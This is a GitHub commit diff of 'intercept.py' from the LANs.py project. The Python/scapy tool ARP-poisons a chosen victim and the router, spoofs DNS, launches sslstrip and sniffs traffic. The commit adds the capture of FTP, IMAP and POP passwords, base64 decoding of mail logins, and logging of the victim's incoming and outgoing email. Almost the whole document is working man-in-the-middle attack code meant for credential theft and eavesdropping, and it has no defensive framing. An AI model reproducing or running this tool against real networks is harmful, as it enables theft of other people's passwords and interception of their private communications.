github/LANs.py
1
0
Fork 0
mirror of https://github.com/DanMcInerney/LANs.py.git synced 2025-07-15 09:33:49 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Now catches FTP, IMAP, and POP passwords as well as incoming and outgoing email messages

Browse source
This commit is contained in:
DanMcInerney 2013-09-25 10:26:58 -06:00
parent 87849a4882
commit c0da8dc5e0
1 changed files with 427 additions and 253 deletions
Download patch file Download diff file Expand all files Collapse all files

574
intercept.py
View file

@ -6,48 +6,28 @@ from scapy.all import *
conf.verb=0 conf.verb=0
#Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server #Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255 but receiving from the IP of the DHCP server
conf.checkIPaddr=0 conf.checkIPaddr=0
import time
import sys import sys
import threading from threading import Thread
import argparse import argparse
import sys import sys
import os import os
import signal import signal
import base64
from subprocess import * from subprocess import *
#Check if root
if not os.geteuid()==0:
sys.exit("\nPlease run as root\n")
#Create the arguments #Create the arguments
parser = argparse.ArgumentParser() parser = argparse.ArgumentParser()
parser.add_argument("-u", "--urlspy", help="Show all URLs the victim is browsing minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -uv to print all URLs and without truncation.", action="store_true") parser.add_argument("-u", "--urlspy", help="Show all URLs the victim is browsing minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -uv to print all URLs and without truncation.", action="store_true")
parser.add_argument("-d", "--dnsspy", help="Show all DNS resquests the victim makes. This has the advantage of showing HTTPS domains which the -u option will not but does not show the full URL the victim is requesting.", action="store_true")
parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning.") parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning.")
parser.add_argument("-dn", "--driftnet", help="Open an xterm window with driftnet.", action="store_true") parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")
parser.add_argument("-ssl", "--sslstrip", help="Open an xterm window with sslstrip and output to sslstrip.txt", action="store_true") parser.add_argument("-s", "--sslstrip", help="Open an xterm window with sslstrip and output to sslstrip.txt", action="store_true")
parser.add_argument("-uv", "--verboseURL", help="Shows all URLs the victim visits", action="store_true") parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits", action="store_true")
parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument") parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument")
parser.add_argument("-p", "--post", help="Print the URL the victim POSTs to, show usernames and passwords in unsecure HTTP POSTs", action="store_true") parser.add_argument("-p", "--post", help="Print the URL the victim POSTs to, show usernames/passwords in unsecure HTTP POSTs, show FTP usernames/passwords", action="store_true")
parser.add_argument("-s", "--search", help="Print victim's search queries", action="store_true") parser.add_argument("-w", "--write", help="Write to logfile", action="store_true")
parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`") parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`")
args = parser.parse_args() args = parser.parse_args()
# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')
#Find the gateway and use it as the router's info
ipr = Popen(['ip', 'route'], stdout=PIPE, stderr=DN)
ipr = ipr.communicate()[0]
routerRE = re.search('default via ((\d{2,3}\.\d{1,3}\.\d{1,4}\.)\d{1,3}) \w+ (\w[a-zA-Z0-9]\w[a-zA-Z0-9][0-9]?)', ipr)
routerIP = routerRE.group(1)
IPprefix = routerRE.group(2)
if args.interface:
interface = args.interface
else:
interface = routerRE.group(3)
localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
localMAC = get_if_hwaddr(interface)
#Console colors #Console colors
W = '\033[0m' # white (normal) W = '\033[0m' # white (normal)
R = '\033[31m' # red R = '\033[31m' # red
@ -59,73 +39,62 @@ C = '\033[36m' # cyan
GR = '\033[37m' # gray GR = '\033[37m' # gray
T = '\033[93m' # tan T = '\033[93m' # tan
print "Checking the DHCP and DNS server addresses...\n" # /dev/null, send output from programs so they don't print to screen.
dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/ oldack = None
IP(src="0.0.0.0",dst="255.255.255.255")/ oldload = None
UDP(sport=68,dport=67)/ oldurl = None
BOOTP(chaddr='E3:2E:F4:DD:8R:9A')/ oldhttp = None
DHCP(options=[("message-type","discover"), if args.write:
("param_req_list", logger = open('interceptlog.txt', 'w+')
chr(DHCPRevOptions["router"][0]),
chr(DHCPRevOptions["domain"][0]),
chr(DHCPRevOptions["server_id"][0]),
chr(DHCPRevOptions["name_server"][0]),
), "end"]))
ans, unans = srp(dhcp, timeout=6, retry=1) class Spoof():
if ans: def originalMAC(self, ip):
for s,r in ans:
DHCPopt = r[0][DHCP].options
DHCPsrvr = r[0][IP].src
for x in DHCPopt:
if 'domain' in x:
local_domain = x[1]
pass
else:
local_domain = 'None'
if 'name_server' in x:
DNSsrvr = x[1]
else:
print "No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP.\n"
DNSsrvr = routerIP
DHCPsrvr = routerIP
local_domain = 'None'
if args.ipaddress:
victimIP = args.ipaddress
else:
ans,unans = arping(IPprefix+'*')
for s,r in ans:
ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%")
print ips
victimIP = raw_input('\nType victim\'s IP: ')
print ''
def originalMAC(ip):
# srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP # srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3) ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3)
for s,r in ans: for s,r in ans:
return r.sprintf("%Ether.src%") return r.sprintf("%Ether.src%")
def poison(self, routerIP, victimIP, routerMAC, victimMAC):
def poison(routerIP, victimIP): send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff")) send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff")) def restore(self, routerIP, victimIP, routerMAC, victimMAC):
def restore(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3) send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3) send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
def URL(pkt): class Parser():
global host, get, post, url
if pkt.haslayer(Raw) and pkt.haslayer(Ether):
if pkt[Ether].src == victimMAC:
pkt = repr(pkt[Raw].load)
try:
headers, body = pkt.split(r"\r\n\r\n")
except:
headers = pkt
body = ''
headersFound = []
IMAPauth = 0
IMAPdest = ''
POPauth = 0
POPdest = ''
def start(self, pkt):
if pkt.haslayer(Raw) and pkt.haslayer(Ether) and pkt.haslayer(TCP):
if pkt[Ether].src == victimMAC:
self.URL(pkt)
self.mailspy(pkt)
def URL(self, pkt):
global oldack, oldload, oldurl, oldhttp
host = None
get = None
post = None
url = None
#Split the packet between headers and body and grab the URL from the headers
ack = pkt[TCP].ack
pktload = repr(pkt[Raw].load).replace("'", "")
dport = pkt[TCP].dport
sport = pkt[TCP].sport
#If you see any other login variable names, tell me and I'll add em in here
user_regex = '(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&][^&]*))'
pw_regex = '(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))'
try:
headers, body = pktload.split(r"\r\n\r\n")
except:
headers = pktload
body = ''
header_lines = headers.split(r"\r\n") header_lines = headers.split(r"\r\n")
for l in header_lines: for l in header_lines:
searchHost = re.search('[Hh]ost: ', l) searchHost = re.search('[Hh]ost: ', l)
@ -140,57 +109,35 @@ def URL(pkt):
if searchPost: if searchPost:
post = l.split(' ') post = l.split(' ')
post = post[1] post = post[1]
#If a packet with data is retrasmitted amongst multiple packets this will catch all the split up parts that are lacking in features of a normal packet
if args.post and len(pkt) < 450:
if body != '':
username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', body)
password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', body)
if username != [] or password != []:
print T+'[+] Packet may\'ve been split. Load data:',body+W
for x in username:
for u in x:
if '=' in u:
print R+u+W
for y in password:
for p in y:
if '=' in p:
print R+p+W
if not get:
username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', headers)
password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', headers)
if username != [] or password != []:
print T+'[+] Packet may\'ve been split. Load data:',headers+W
for x in username:
for u in x:
if '=' in u:
print R+u+W
for y in password:
for p in y:
if '=' in p:
print R+p+W
if host and get: if host and get:
url = host+get url = host+get
if host and post: if host and post:
url = host+post url = host+post
if url == None:
return
if args.post and post: #Catch fragmented packet passwords, and FTP passwords
if body != '': if args.post:
print B+'[+] POST:',url,'HTTP POST load:',body+W #Catch fragmented packet passwords
username = re.findall('(([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og)=([^&][^&]*))', body) if oldack == ack and oldload and oldhttp == 'post':
password = re.findall('(([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&][^&]*))', body) combined_load = oldload + pktload
for x in username: print B+'[+] fragmented POST:',oldurl,'HTTP POST load:',body+W
for u in x: username = re.findall(user_regex, combined_load)
if '=' in u: password = re.findall(pw_regex, combined_load)
print R+u+W self.user_pass(username, password)
for y in password: #Catch FTP passwords
for p in y: if dport == 21:
if '=' in p: load = pktload.replace(r"\r\n", "")
print R+p+W if 'USER ' in load:
print R+'FTP '+load+W
if args.write:
logger.write('FTP'+load+'\n')
if 'PASS ' in load:
print R+'FTP '+load+W
if args.write:
logger.write('FTP'+load+'\n')
#Catch search terms, print url, print post loads
if url != None:
#Print the URL
if args.urlspy: if args.urlspy:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js'] d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js']
if any(i in url for i in d): if any(i in url for i in d):
@ -199,48 +146,195 @@ def URL(pkt):
print url[:149] print url[:149]
else: else:
print url print url
if args.verboseURL: if args.verboseURL:
print url print url
if args.search: #Catch search terms
searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|keywords)=([^&][^&]*))', url) searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|keywords|command)=([^&][^&]*))', url)
if searched: if searched:
searched = searched.group(3) searched = searched.group(3)
if 'select%20*%20from' in searched:
pass
else:
searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$') searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')
print T+'[+] Searched %s for:' % host,searched+W print T+'[+] Searched %s for:' % host,searched+W
if args.write:
logger.write('[+] Searched %s for: ' % host+searched+'\n')
#Print POST load
if post:
if 'ocsp.' in url:
print B+'[+] POST:',url+W
else:
print B+'[+] POST:',url,'HTTP POST load:',body+W
if body != '':
username = re.findall(user_regex, body)
password = re.findall(pw_regex, body)
self.user_pass(username, password)
oldhttp = 'post'
oldload = pktload
oldack = ack
oldurl = url
if not post:
oldhttp = None
host = None host = None
get = None get = None
post = None post = None
url = None url = None
def DNSreq(pkt): def user_pass(self, username, password):
if pkt.haslayer(DNSQR): if username:
dnsreq = pkt[DNSQR].qname for x in username:
print dnsreq for u in x:
if '=' in u:
print R+u+W
if args.write:
logger.write(u+'\n')
if password:
for y in password:
for p in y:
if '=' in p:
print R+p+W
if args.write:
logger.write(p+'\n')
def mkspoof(DNSpkt): def mailspy(self, pkt):
ip=DNSpkt[IP] dport = pkt[TCP].dport
dnsLayer=DNSpkt[DNS] sport = pkt[TCP].sport
# qr = query or response (0,1), aa=are the nameservers authoritative? (0,1), ad=authenticated data (0,1) MAC_dst = pkt[Ether].dst
p = IP(dst=ip.src, src=ip.dst)/UDP(dport=ip.sport, sport=ip.dport)/DNS(id=dnsLayer.id, qr=1, aa=1, qd=dnsLayer.qd, an=DNSRR(rrname=dnsLayer.qd.qname, ttl=10, rdata=localIP)) MAC_src = pkt[Ether].src
return p mail_ports = [143, 110, 26]
if dport in mail_ports or sport in mail_ports:
load = repr(pkt[Raw].load).replace("'", "")
try:
headers, body = load.split(r"\r\n\r\n", 1)
except:
headers = load
body = ''
header_lines = headers.split(r"\r\n")
email_headers = ['Date: ', 'Subject: ', 'To: ', 'From: ']
# Find passwords
if dport in [110, 143, 26]:
IP_dst = pkt[IP].dst
self.passwords(IP_dst, load, dport)
# Find outgoing messages
if dport == 26:
self.outgoing(load, body, header_lines, email_headers, MAC_src)
# Find incoming msgs
if MAC_dst == victimMAC:
if sport in [110, 143]:
self.incoming(headers, body, header_lines, email_headers)
class urlspy(threading.Thread): def passwords(self, IP_dst, load, dport):
def run(self): if dport == 143:
if self.IMAPauth == 1 and IP_dst == self.IMAPdest:
print R+'[!] IMAP user and pass found: '+load+W
if args.write:
logger.write('[!] IMAP user and pass found: '+load+'\n')
self.decode(load, dport)
self.IMAPauth = 0
self.IMAPdest = ''
if "authenticate plain" in load:
self.IMAPauth = 1
self.IMAPdest = IP_dst
if dport == 110:
if self.POPauth == 1 and IP_dst == self.POPdest:
print R+'[!] POP user and pass found: '+load+W
if args.write:
logger.write('[!] POP user and pass found: '+load+'\n')
self.decode(load, dport)
self.POPauth = 0
self.POPdest = ''
if "AUTH PLAIN" in load:
self.POPauth = 1
self.POPdest = IP_dst
if dport == 26:
if 'AUTH PLAIN ' in load:
print R+'[!] POP authentication found: '+load+W
if args.write:
logger.write('[!] POP authentication found: '+load+'\n')
self.decode(load, dport)
def outgoing(self, headers, body, header_lines, email_headers, MAC_src):
if MAC_src == victimMAC:
if 'Message-ID' in headers:
for l in header_lines:
for x in email_headers:
if x in l:
self.headersFound.append(l)
if len(self.headersFound) > 3:
print O+'[!] OUTGOING MESSAGE'+W
if args.write:
logger.write('[!] OUTGOING MESSAGE\n')
for x in self.headersFound:
print O+' ',x+W
if args.write:
logger.write(' '+x+'\n')
self.headersFound = []
if body != '':
print O+' Message:',body+W
if args.write:
logger.write(' Message:'+body+'\n')
def incoming(self, headers, body, header_lines, email_headers):
if 'FETCH' not in headers:
for l in header_lines:
for x in email_headers:
if x in l:
self.headersFound.append(l)
if len(self.headersFound) > 3:
print O+'[!] INCOMING MESSAGE'+W
if args.write:
logger.write('[!] INCOMING MESSAGE\n')
for x in self.headersFound:
print O+' '+x+W
if args.write:
logger.write(' '+x+'\n')
self.headersFound = []
if body != '':
try:
beginning = body.split(r"\r\n")[0]
message = str(body.split(r"\r\n\r\n", 1)[1:]).replace('[', '', 1)
message = message.split(beginning)[0]
print O+' Message:', message+W
if args.write:
logger.write(' Message:'+message+'\n')
except:
print O+' Couldn\'t format message body:', body+W
def decode(self, load, dport):
if dport == 26:
try:
b64str = load.replace("AUTH PLAIN ", "").replace(r"\r\n", "")
b64decode = base64.b64decode(b64str)
print R+'[!] Decoded:'+b64decode+W
if args.write:
logger.write('[!] Decoded: '+b64decode+'\n')
except:
pass
else:
try:
b64str = load.replace(r"\r\n", "")
b64decode = base64.b64decode(b64str)
print R+'[!] Decoded:',b64decode+W
if args.write:
logger.write('[!] Decoded: '+b64decode+'\n')
except:
pass
class Threads():
def urlspy(self, victimIP, interface):
# This is in case you need to test the program without an actual victim # This is in case you need to test the program without an actual victim
# sniff(store=0, filter='port 80', prn=URL, iface=interface) # sniff(store=0, filter='port 80 or port 21', prn=URL, iface=interface)
sniff(store=0, filter='port 80 and host %s' % victimIP, prn=URL, iface=interface) sniff_filter = '(port 80 or port 21 or port 143 or port 110 or port 26) and host %s' % victimIP
sniff(store=0, filter=sniff_filter, prn=Parser().start, iface=interface)
class dnsspy(threading.Thread): def dnsspoof(self, victimIP):
def run(self):
sniff(store=0, filter='port 53 and host %s' % victimIP, prn=DNSreq, iface=interface)
class dnsspoof(threading.Thread):
def run(self):
while 1: while 1:
a=sniff(filter='port 53 or port 80 and host %s' % victimIP, count=1, promisc=1) a=sniff(filter='port 53 and host %s' % victimIP, count=1, promisc=1)
DNSpkt = a[0] DNSpkt = a[0]
if not DNSpkt.haslayer(DNSQR): if not DNSpkt.haslayer(DNSQR):
continue continue
@ -248,38 +342,51 @@ class dnsspoof(threading.Thread):
send(mkspoof(DNSpkt)) send(mkspoof(DNSpkt))
print G + '[+] Spoofed:', DNSpkt.qd.qname + W print G + '[+] Spoofed:', DNSpkt.qd.qname + W
class sslstrip(threading.Thread): def sslstrip(self, DN):
def run(self):
print 'Redirecting traffic to port 10000 and starting sslstrip\n' print 'Redirecting traffic to port 10000 and starting sslstrip\n'
iptables = ['iptables', '-t', 'nat', '-A', 'PREROUTING', '-p', 'tcp', '--destination-port', '80', '-j', 'REDIRECT', '--to-port', '10000'] iptables = ['iptables', '-t', 'nat', '-A', 'PREROUTING', '-p', 'tcp', '--destination-port', '80', '-j', 'REDIRECT', '--to-port', '10000']
Popen(iptables, stdout=PIPE, stderr=DN) Popen(iptables, stdout=PIPE, stderr=DN)
xterm = ['xterm', '-e', 'sslstrip', '-f', '-w', 'sslstrip.txt'] xterm = ['xterm', '-e', 'sslstrip', '-f', '-w', 'sslstrip.txt']
Popen(xterm, stdout=PIPE, stderr=DN) Popen(xterm, stdout=PIPE, stderr=DN)
class driftnet(threading.Thread): def driftnet(self, interface, DN):
def run(self):
xterm = ['xterm', '-e', 'driftnet', '-i', '%s' % interface] xterm = ['xterm', '-e', 'driftnet', '-i', '%s' % interface]
Popen(xterm, stdout=PIPE, stderr=DN) Popen(xterm, stdout=PIPE, stderr=DN)
def start_threads(self, victimIP, interface, DN):
if args.urlspy or args.verboseURL or args.post:
u = Thread(target=self.urlspy, args=(victimIP, interface))
#Make sure the thread closes with the main program on Ctrl-C
u.daemon = True
u.start()
if args.driftnet:
dr = Thread(target=self.driftnet, args=(interface, DN))
dr.daemon = True
dr.start()
if args.sslstrip:
ssl = Thread(target=self.sslstrip, args=(DN,))
ssl.daemon = True
ssl.start()
if args.dnsspoof:
dns = Thread(target=self.dnsspoof, args=(victimIP,))
dns.daemon = True
dns.start()
#Print all the variables
def print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
print "[+] Active interface: " + interface print "[+] Active interface: " + interface
print "[+] Local IP: " + localIP
print "[+] Interface MAC: " + localMAC
print "[+] DHCP server: " + DHCPsrvr print "[+] DHCP server: " + DHCPsrvr
print "[+] DNS server: " + DNSsrvr print "[+] DNS server: " + dnsIP
print "[+] Local domain: " + local_domain print "[+] Local domain: " + local_domain
print "[+] Router IP: " + routerIP print "[+] Router IP: " + routerIP
print "[+] Client IP: " + victimIP print "[+] Client IP: " + victimIP
try:
routerMAC = originalMAC(routerIP)
print "[+] Router MAC: " + routerMAC def ip_flush_forward(DN):
victimMAC = originalMAC(victimIP)
print "[+] Victim MAC: " + victimMAC
except:
sys.exit("Could not get MAC addresses")
ipfwd = Popen(['cat', '/proc/sys/net/ipv4/ip_forward'], stdout=PIPE, stderr=DN) ipfwd = Popen(['cat', '/proc/sys/net/ipv4/ip_forward'], stdout=PIPE, stderr=DN)
if not ipfwd.communicate()[0] == '1': if ipfwd.communicate()[0] != '1\n':
f = open('/proc/sys/net/ipv4/ip_forward', 'r+') f = open('/proc/sys/net/ipv4/ip_forward', 'r+')
f.write('1') f.write('1\n')
f.close() f.close()
print '[+] Enabled IP forwarding' print '[+] Enabled IP forwarding'
Popen(['iptables', '-F'], stdout=PIPE, stderr=DN) Popen(['iptables', '-F'], stdout=PIPE, stderr=DN)
@ -289,54 +396,121 @@ Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN)
print '[+] Flushed the firewall\n' print '[+] Flushed the firewall\n'
def main(): def main():
#For use in URL_cb, mailspy respectively
global victimMAC, victimIP
if args.urlspy or args.verboseURL or args.post or args.search: #Check if root
ug = urlspy() if not os.geteuid()==0:
#Make sure the thread closes with the main program on Ctrl-C sys.exit("\nPlease run as root\n")
ug.daemon = True
ug.start()
if args.dnsspy: DN = open(os.devnull, 'w')
dt = dnsspy()
dt.daemon = True
dt.start()
if args.driftnet: if args.ipaddress:
dr = driftnet() victimIP = args.ipaddress
dr.daemon = True else:
dr.start() ans,unans = arping(IPprefix+'*')
for s,r in ans:
ips = r.sprintf("%ARP.hwsrc% %ARP.psrc%")
print ips
victimIP = raw_input('\nType victim\'s IP: ')
print ''
if args.sslstrip: #Find the gateway and interface
ssl = sslstrip() ipr = Popen(['ip', 'route'], stdout=PIPE, stderr=DN)
ssl.daemon = True ipr = ipr.communicate()[0]
ssl.start() routerRE = re.search('default via ((\d{2,3}\.\d{1,3}\.\d{1,4}\.)\d{1,3}) \w+ (\w[a-zA-Z0-9]\w[a-zA-Z0-9][0-9]?)', ipr)
routerIP = routerRE.group(1)
IPprefix = routerRE.group(2)
if args.interface:
interface = args.interface
else:
interface = routerRE.group(3)
if args.dnsspoof: print "[+] Checking the DHCP and DNS server addresses..."
ds = dnsspoof() dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/
ds.daemon = True IP(src="0.0.0.0",dst="255.255.255.255")/
ds.start() UDP(sport=68,dport=67)/
BOOTP(chaddr='E3:2E:F4:DD:8R:9A')/
DHCP(options=[("message-type","discover"),
("param_req_list",
chr(DHCPRevOptions["router"][0]),
chr(DHCPRevOptions["domain"][0]),
chr(DHCPRevOptions["server_id"][0]),
chr(DHCPRevOptions["name_server"][0]),
), "end"]))
ans, unans = srp(dhcp, timeout=6, retry=1)
if ans:
for s,r in ans:
DHCPopt = r[0][DHCP].options
DHCPsrvr = r[0][IP].src
for x in DHCPopt:
if 'domain' in x:
local_domain = x[1]
pass
else:
local_domain = 'None'
if 'name_server' in x:
dnsIP = x[1]
else:
print "[!] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP."
dnsIP = routerIP
DHCPsrvr = routerIP
local_domain = 'None'
print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP)
try:
routerMAC = Spoof().originalMAC(routerIP)
print "[+] Router MAC: " + routerMAC
except:
sys.exit("[!] Could not get router MAC address")
try:
victimMAC = Spoof().originalMAC(victimIP)
print "[+] Victim MAC: " + victimMAC
except:
sys.exit("[!] Could not get victim MAC address")
if not dnsIP == routerIP:
try:
dnsMAC = Spoof().originalMAC(dnsIP)
print "[+] DNS server MAC: " + dnsMAC
except:
print "[!] Could not get DNS server MAC address"
sys.exit("[!] Could not get victim MAC address")
ip_flush_forward(DN)
Threads().start_threads(victimIP, interface, DN)
def signal_handler(signal, frame): def signal_handler(signal, frame):
print 'learing iptables, sending healing packets, and turning off IP forwarding...' print 'learing iptables, sending healing packets, and turning off IP forwarding...'
restore(routerIP, victimIP, routerMAC, victimMAC) if args.write:
restore(routerIP, victimIP, routerMAC, victimMAC) logger.close()
f = open('/proc/sys/net/ipv4/ip_forward', 'r+') if args.dnsspoof:
f.write('0') q.unbind(socket.AF_INET)
f.close() q.close()
if not dnsIP == routerIP:
Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
Popen(['iptables', '-F'], stdout=PIPE, stderr=DN) Popen(['iptables', '-F'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN) Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-X'], stdout=PIPE, stderr=DN) Popen(['iptables', '-X'], stdout=PIPE, stderr=DN)
Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN) Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN)
Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
sys.exit(0) sys.exit(0)
signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGINT, signal_handler)
while 1: while 1:
poison(routerIP, victimIP) Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
if not DNSsrvr == routerIP: if not dnsIP == routerIP:
poison(DNSsrvr, victimIP) Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC)
time.sleep(1.5) time.sleep(1.5)
if __name__ == "__main__": if __name__ == "__main__":
main() main()
#To do:
#use iptables to block dns responses from the router to prevent race condition in dns spoofing